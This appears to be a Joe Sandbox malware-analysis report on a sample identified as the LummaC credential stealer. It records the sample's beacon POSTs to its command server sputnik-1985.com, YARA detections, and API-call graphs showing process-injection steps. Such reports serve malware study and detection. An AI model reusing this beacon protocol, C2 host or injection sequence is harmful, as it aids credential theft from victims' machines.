                                                                                                                                                                                                                        2025-01-10 10:36:28 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=075K4N27BXN
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 1231
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:28 UTC1231OUTData Raw: 2d 2d 30 37 35 4b 34 4e 32 37 42 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 30 37 35 4b 34 4e 32 37 42 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 37 35 4b 34 4e 32 37 42 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 30 37 35 4b 34 4e 32 37 42 58
                                                                                                                                                                                                                        Data Ascii: --075K4N27BXNContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--075K4N27BXNContent-Disposition: form-data; name="pid"1--075K4N27BXNContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--075K4N27BX
                                                                                                                                                                                                                        2025-01-10 10:36:28 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:28 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=om52u0ubj8o8uo8vaio2aa6pm3; expires=Tue, 06 May 2025 04:23:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=llXMJiYpebkpKV%2BF91yHEJe8z7G7XjoXj44g%2FEPqjwF3PuIhHx149yQV3rGXHtwd1BnnFFQK0fdzlBpP0SiZ9MFbXZ5WBiFMBzeXEhyUtKZSiBqSyNvI%2BNQmrgwW4QqR08Ir"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc06b3cae67c6a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1964&rtt_var=742&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2141&delivery_rate=1468074&cwnd=218&unsent_bytes=0&cid=ec0f90dd1ab10149&ts=439&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                        2025-01-10 10:36:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.1249727104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:29 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=ZIOL9PUC4F
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 1065
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:29 UTC1065OUTData Raw: 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 5a 49 4f 4c 39 50 55 43 34 46 0d 0a 43
                                                                                                                                                                                                                        Data Ascii: --ZIOL9PUC4FContent-Disposition: form-data; name="hwid"3C04669308839219BCFD68B774EF9B7A--ZIOL9PUC4FContent-Disposition: form-data; name="pid"1--ZIOL9PUC4FContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--ZIOL9PUC4FC
                                                                                                                                                                                                                        2025-01-10 10:36:29 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:29 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=7d198i746vi1laidl21f16lssq; expires=Tue, 06 May 2025 04:23:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUNopk5QN8WplhQzliFy8pNfT0kBMyHQswJYLUNoV7LCwM1xRNeHZCVIv%2BIPGgQY923O6rrwYuZJeDWLprY7HgQvPqIct0z8ckngfhjqexMUWAnQujIH1xltQZgGvi8B%2B7xV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc06b9ee7f8ca1-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1948&rtt_var=735&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1974&delivery_rate=1483739&cwnd=168&unsent_bytes=0&cid=d50bc995e92b644b&ts=541&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                        2025-01-10 10:36:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.2.1249728104.21.64.14436988C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 10:36:30 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Length: 121
                                                                                                                                                                                                                        Host: sputnik-1985.com
                                                                                                                                                                                                                        2025-01-10 10:36:30 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 33 43 30 34 36 36 39 33 30 38 38 33 39 32 31 39 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41
                                                                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=3C04669308839219BCFD68B774EF9B7A
                                                                                                                                                                                                                        2025-01-10 10:36:30 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 10:36:30 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pecfu88bivvgccqqg0qunps66n; expires=Tue, 06 May 2025 04:23:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAk%2BeagfmvE2bvmvQ4%2B%2B3VbH981V9n%2BpKsjMKpt%2BYEUIb6KzMuzAJwt%2FiUyf6iydcWk63c3TTD8Ar%2Bp8fjXyQPs%2FNX%2FesrbMDn3hqUmBYD81OIgXu7k4TNS2RrehavADfuyQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffc06c26b787c6a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2021&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1418853&cwnd=218&unsent_bytes=0&cid=3df8a990b05a237e&ts=462&x=0"
                                                                                                                                                                                                                        2025-01-10 10:36:30 UTC54INData Raw: 33 30 0d 0a 75 37 45 61 75 2b 61 54 79 6d 62 79 76 4c 52 50 4e 43 4b 47 47 46 58 4d 59 53 43 38 2f 73 39 64 52 75 79 2b 6d 50 71 63 61 6c 7a 67 37 41 3d 3d 0d 0a
                                                                                                                                                                                                                        Data Ascii: 30u7Eau+aTymbyvLRPNCKGGFXMYSC8/s9dRuy+mPqcalzg7A==
                                                                                                                                                                                                                        2025-01-10 10:36:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:05:36:07
                                                                                                                                                                                                                        Start date:10/01/2025
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\expt64.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\expt64.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:10'171'362 bytes
                                                                                                                                                                                                                        MD5 hash:C4CB62A984955F3AD185C1B289D816D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:1.4%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:36.7%
                                                                                                                                                                                                                          Total number of Nodes:128
                                                                                                                                                                                                                          Total number of Limit Nodes:13
                                                                                                                                                                                                                          execution_graph 15194 22f05af 15195 22f05bd 15194->15195 15208 22f0eff 15195->15208 15197 22f0755 GetPEB 15199 22f07d2 15197->15199 15198 22f0710 15198->15197 15207 22f0a43 15198->15207 15211 22f0cbf 15199->15211 15202 22f0833 CreateThread 15203 22f080b 15202->15203 15223 22f0b6f GetPEB 15202->15223 15203->15207 15219 22f11bf GetPEB 15203->15219 15205 22f0cbf 4 API calls 15205->15207 15221 22f0f1f GetPEB 15208->15221 15210 22f0f0c 15210->15198 15212 22f0cd5 CreateToolhelp32Snapshot 15211->15212 15214 22f0805 15212->15214 15215 22f0d0c Thread32First 15212->15215 15214->15202 15214->15203 15215->15214 15216 22f0d33 15215->15216 15216->15214 15217 22f0d6a Wow64SuspendThread 15216->15217 15218 22f0d94 CloseHandle 15216->15218 15217->15218 15218->15216 15220 22f088d 15219->15220 15220->15205 15220->15207 15222 22f0f3a 15221->15222 15222->15210 15224 22f0bc8 15223->15224 15225 22f0c28 CreateThread 15224->15225 15226 22f0c75 15224->15226 15225->15224 15227 22f139f 15225->15227 15230 233d764 15227->15230 15229 22f13a4 15231 233d76e 15230->15231 15232 2340c5a 15230->15232 15231->15229 15233 2340c7e 15232->15233 15234 2340d68 15232->15234 15269 23434db 15233->15269 15244 2341f34 15234->15244 15237 2340c96 15238 23434db LoadLibraryA 15237->15238 15243 2340d0e 15237->15243 15239 2340cd8 15238->15239 15240 23434db LoadLibraryA 15239->15240 15241 2340cf4 15240->15241 15242 23434db LoadLibraryA 15241->15242 15242->15243 15243->15229 15245 23434db LoadLibraryA 15244->15245 15246 2341f57 15245->15246 15247 23434db LoadLibraryA 15246->15247 15248 2341f6f 15247->15248 15249 23434db LoadLibraryA 15248->15249 15250 2341f8d 15249->15250 15251 2341fa2 VirtualAlloc 15250->15251 15252 2341fb6 15250->15252 15251->15252 15254 2341fd0 15251->15254 15252->15243 15253 23434db LoadLibraryA 15256 234204e 15253->15256 15254->15253 15268 2342229 15254->15268 15255 23420a4 15257 23434db LoadLibraryA 15255->15257 15258 2342106 15255->15258 15255->15268 15256->15252 15256->15255 15273 23432e2 15256->15273 15257->15255 15267 2342168 15258->15267 15258->15268 15277 23410c4 15258->15277 15260 23422e7 VirtualFree 15260->15252 15261 23422f9 RtlExitUserProcess 15260->15261 15261->15252 15266 2342286 15266->15266 15267->15268 15300 2342664 15267->15300 15268->15260 15268->15266 15271 23434f2 15269->15271 15270 2343519 15270->15237 15271->15270 15338 23415e0 15271->15338 15276 23432f7 15273->15276 15274 234336d LoadLibraryA 15275 2343377 15274->15275 15275->15256 15276->15274 15276->15275 15278 23432e2 LoadLibraryA 15277->15278 15279 23410d8 15278->15279 15282 23410e0 15279->15282 15324 2343380 15279->15324 15282->15268 15291 23411bf 15282->15291 15283 2341116 VirtualProtect 15283->15282 15284 234112a 15283->15284 15285 2341144 VirtualProtect 15284->15285 15286 2343380 LoadLibraryA 15285->15286 15287 2341165 15286->15287 15287->15282 15288 234117c VirtualProtect 15287->15288 15288->15282 15289 234118c 15288->15289 15290 23411a1 VirtualProtect 15289->15290 15290->15282 15292 23432e2 LoadLibraryA 15291->15292 15293 23411d5 15292->15293 15294 2343380 LoadLibraryA 15293->15294 15295 23411e5 15294->15295 15296 2341222 15295->15296 15297 23411ee VirtualProtect 15295->15297 15296->15267 15297->15296 15298 23411fe 15297->15298 15299 234120d VirtualProtect 15298->15299 15299->15296 15301 234269f 15300->15301 15302 23426e6 NtCreateSection 15301->15302 15303 234270b 15301->15303 15323 2342d13 15301->15323 15302->15303 15302->15323 15304 23427a0 NtMapViewOfSection 15303->15304 15303->15323 15308 23427c0 15304->15308 15305 2342ae9 VirtualAlloc 15310 2342b2b 15305->15310 15306 23432e2 LoadLibraryA 15306->15308 15307 23432e2 LoadLibraryA 15309 2342a47 15307->15309 15308->15306 15308->15309 15314 2343380 LoadLibraryA 15308->15314 15308->15323 15309->15305 15309->15307 15313 2342ae5 15309->15313 15316 2343380 LoadLibraryA 15309->15316 15311 2342bdc VirtualProtect 15310->15311 15319 2342bc9 NtMapViewOfSection 15310->15319 15310->15323 15312 2342ca7 VirtualProtect 15311->15312 15317 2342bfc 15311->15317 15322 2342cd6 15312->15322 15313->15305 15314->15308 15315 2342e21 15318 2342e29 CreateThread 15315->15318 15315->15323 15316->15309 15317->15312 15321 2342c81 VirtualProtect 15317->15321 15318->15323 15319->15311 15319->15323 15321->15317 15322->15315 15322->15323 15334 2343095 15322->15334 15323->15268 15325 23410f8 15324->15325 15326 234339b 15324->15326 15325->15282 15325->15283 15326->15325 15328 2341785 15326->15328 15329 23417ca 15328->15329 15332 23417a4 15328->15332 15330 23432e2 LoadLibraryA 15329->15330 15331 23417d7 15329->15331 15330->15331 15331->15325 15332->15329 15332->15331 15333 2343380 LoadLibraryA 15332->15333 15333->15332 15337 23430bd 15334->15337 15335 23432af 15335->15315 15336 2343380 LoadLibraryA 15336->15337 15337->15335 15337->15336 15339 23416e5 15338->15339 15340 2341600 15338->15340 15339->15271 15340->15339 15341 2341785 LoadLibraryA 15340->15341 15341->15339
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 023426FD
                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 023427A5
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02342B19
                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02342BCE
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02342BEB
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02342C8E
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02342CC1
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02342E32
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1248616170-0
                                                                                                                                                                                                                          • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                          • Instruction ID: aee67486749d84231354ea0d8b63c672d27ab598786af6a355477c165855f42e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65427871604301AFDB24CF25C844B6BBBE9EF88714F1449ADFD85AB251EB30E944CB91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 187 22f0cbf-22f0d06 CreateToolhelp32Snapshot 190 22f0ddc-22f0ddf 187->190 191 22f0d0c-22f0d2d Thread32First 187->191 192 22f0dc8-22f0dd7 191->192 193 22f0d33-22f0d39 191->193 192->190 194 22f0d3b-22f0d41 193->194 195 22f0da8-22f0dc2 193->195 194->195 196 22f0d43-22f0d62 194->196 195->192 195->193 196->195 199 22f0d64-22f0d68 196->199 200 22f0d6a-22f0d7e Wow64SuspendThread 199->200 201 22f0d80-22f0d8f 199->201 202 22f0d94-22f0da6 CloseHandle 200->202 201->202 202->195
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,022F0805,?,00000001,?,81EC8B55,000000FF), ref: 022F0CFD
                                                                                                                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 022F0D29
                                                                                                                                                                                                                          • Wow64SuspendThread.KERNEL32(00000000), ref: 022F0D7C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 022F0DA6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849706056-0
                                                                                                                                                                                                                          • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                          • Instruction ID: 035b000b9a6df816d55b3f597d2b05679cb87230b73955747dfef44f262af167
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1411E71A00109AFDB58DF98C490FADB7F6EF88300F508168E6159B799DB35AE41CB94

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 343 22f05af-22f0717 call 22f0b5f call 22f115f call 22f130f call 22f0eff 352 22f071d-22f0724 343->352 353 22f0b48-22f0b4b 343->353 354 22f072f-22f0733 352->354 355 22f0755-22f07d0 GetPEB 354->355 356 22f0735-22f0753 call 22f107f 354->356 358 22f07db-22f07df 355->358 356->354 360 22f07f7-22f0809 call 22f0cbf 358->360 361 22f07e1-22f07f5 358->361 366 22f080b-22f0831 360->366 367 22f0833-22f0854 CreateThread 360->367 361->358 368 22f0857-22f085b 366->368 367->368 370 22f0b1c-22f0b3f 368->370 371 22f0861-22f0894 call 22f11bf 368->371 370->353 371->370 375 22f089a-22f08e9 371->375 377 22f08f4-22f08fa 375->377 378 22f08fc-22f0902 377->378 379 22f0942-22f0946 377->379 382 22f0915-22f0919 378->382 383 22f0904-22f0913 378->383 380 22f094c-22f0959 379->380 381 22f0a14-22f0b07 call 22f0cbf call 22f0b5f call 22f115f 379->381 386 22f0964-22f096a 380->386 409 22f0b0c-22f0b16 381->409 410 22f0b09 381->410 384 22f091b-22f0929 382->384 385 22f0940 382->385 383->382 384->385 387 22f092b-22f093d 384->387 385->377 390 22f096c-22f097a 386->390 391 22f099a-22f099d 386->391 387->385 393 22f097c-22f098b 390->393 394 22f0998 390->394 395 22f09a0-22f09a7 391->395 393->394 397 22f098d-22f0996 393->397 394->386 395->381 399 22f09a9-22f09b2 395->399 397->391 399->381 401 22f09b4-22f09c4 399->401 402 22f09cf-22f09db 401->402 404 22f09dd-22f0a0a 402->404 405 22f0a0c-22f0a12 402->405 404->402 405->395 409->370 410->409
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 022F0852
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID: DfB
                                                                                                                                                                                                                          • API String ID: 2422867632-4156147959
                                                                                                                                                                                                                          • Opcode ID: b4fc5f4db1c781e55f86b7ec5908b47ba6b87ba54054a6bb3863a94c77eeda71
                                                                                                                                                                                                                          • Instruction ID: 6b8890dc0988c72cb92ce3b83dfc035b894f628eb05fc298c376d73ed854481e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4fc5f4db1c781e55f86b7ec5908b47ba6b87ba54054a6bb3863a94c77eeda71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C12B3B4E10219DBDB14CF98C990BADFBB2FF48304F2482A9D615AB389D7746A41CF54

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 411 22f0b6f-22f0bc6 GetPEB 412 22f0bd1-22f0bd5 411->412 413 22f0bdb-22f0be6 412->413 414 22f0c75-22f0c7c 412->414 416 22f0bec-22f0c03 413->416 417 22f0c70 413->417 415 22f0c87-22f0c8b 414->415 419 22f0c8d-22f0c9a 415->419 420 22f0c9c-22f0ca3 415->420 421 22f0c28-22f0c40 CreateThread 416->421 422 22f0c05-22f0c26 416->422 417->412 419->415 425 22f0cac-22f0cb1 420->425 426 22f0ca5-22f0ca7 420->426 423 22f0c44-22f0c4c 421->423 422->423 423->417 428 22f0c4e-22f0c6b 423->428 426->425 428->417
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 022F0C3B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                          • API String ID: 2422867632-3772416878
